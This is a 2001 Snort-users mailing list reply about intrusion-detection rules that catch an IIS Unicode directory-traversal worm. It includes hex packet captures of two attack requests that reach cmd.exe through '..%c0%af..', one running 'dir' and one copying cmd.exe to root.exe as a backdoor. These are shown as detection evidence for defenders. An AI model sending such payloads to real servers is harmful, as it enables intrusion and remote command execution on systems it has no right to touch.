Re: sadmind rule

[Andreas Östling <andreaso () it su se>]

On Wed, 9 May 2001, Andrew Daviel wrote:

> On Wed, 9 May 2001, Max Vision wrote:
>
> > The NT/IIS attacks will be seen by IDS433:
> >  http://whitehats.com/info/IDS433  (http-iis-unicode-traversal-optyx)
>
> Not if the HTTP preprocessor is enabled - which for me gives
> way too many "spp_http_decode: IIS Unicode attack detected " to
> believe.
>
> The IDS433 rule doesn't seem to be in the ruleset I was running (Jan 18
> 2001 probably) or in the "current" 1.7 snortrules.tar.gz" I just
> downloaded.


IDS452/http-iis-unicode-binary has done the job for me (catching the new
worm).

[**] IDS452/http-iis-unicode-binary [**]
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E C0  GET /scripts/...
AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D  .../winnt/system
33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69  32/cmd.exe?/c+di
72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A        r HTTP/1.0....

[**] IDS452/http-iis-unicode-binary [**]
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E C0  GET /scripts/...
AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D  .../winnt/system
33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 63 6F  32/cmd.exe?/c+co
70 79 2B 5C 77 69 6E 6E 74 5C 73 79 73 74 65 6D  py+\winnt\system
33 32 5C 63 6D 64 2E 65 78 65 2B 72 6F 6F 74 2E  32\cmd.exe+root.
65 78 65 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A  exe HTTP/1.0....


Regards,
Andreas Östling


_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
http://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users